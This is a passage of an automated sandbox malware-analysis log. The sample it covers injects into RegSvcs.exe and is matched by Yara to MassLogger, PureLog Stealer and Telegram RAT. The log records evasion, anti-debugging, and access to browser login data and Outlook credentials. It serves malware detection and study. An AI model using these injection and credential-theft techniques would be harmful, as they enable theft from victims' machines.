              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594999Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1552Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8304Jump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeEvaded block: after key decisiongraph_0-93870
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94751
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeAPI coverage: 4.3 %
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00346CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00346CA9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003460DD
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003463F9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0034EB60
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034F56F FindFirstFileW,FindClose,0_2_0034F56F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0034F5FA
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00351B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00351B2F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00351C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00351C8A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00351F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00351F94
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0031DDC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599654Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598795Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598685Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598572Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598460Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596374Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596264Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595978Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595685Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595567Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594999Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594124Jump to behavior
              Source: RegSvcs.exe, 00000002.00000002.4776308739.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeAPI call chain: ExitProcess graph end nodegraph_0-93309
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeAPI call chain: ExitProcess graph end nodegraph_0-93993
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00356AAF BlockInput,0_2_00356AAF
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00303D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00303D19
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00333920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00333920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031E01E LoadLibraryA,GetProcAddress,0_2_0031E01E
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00D46710 mov eax, dword ptr fs:[00000030h]0_2_00D46710
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00D47DA0 mov eax, dword ptr fs:[00000030h]0_2_00D47DA0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00D47D40 mov eax, dword ptr fs:[00000030h]0_2_00D47D40
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0033A66C
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003281AC
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00328189 SetUnhandledExceptionFilter,0_2_00328189
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AF3008Jump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033B106 LogonUserW,0_2_0033B106
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00303D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00303D19
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034411C SendInput,keybd_event,0_2_0034411C
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003474BB mouse_event,0_2_003474BB
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mnXS9meqtB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0033A66C
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003471FA
              Source: mnXS9meqtB.exeBinary or memory string: Shell_TrayWnd
              Source: mnXS9meqtB.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003265C4 cpuid 0_2_003265C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0035091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0035091D
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0037B340 GetUserNameW,0_2_0037B340
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00331E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00331E8E
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0031DDC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: mnXS9meqtB.exeBinary or memory string: WIN_81
              Source: mnXS9meqtB.exeBinary or memory string: WIN_XP
              Source: mnXS9meqtB.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
              Source: mnXS9meqtB.exeBinary or memory string: WIN_XPe
              Source: mnXS9meqtB.exeBinary or memory string: WIN_VISTA
              Source: mnXS9meqtB.exeBinary or memory string: WIN_7
              Source: mnXS9meqtB.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE
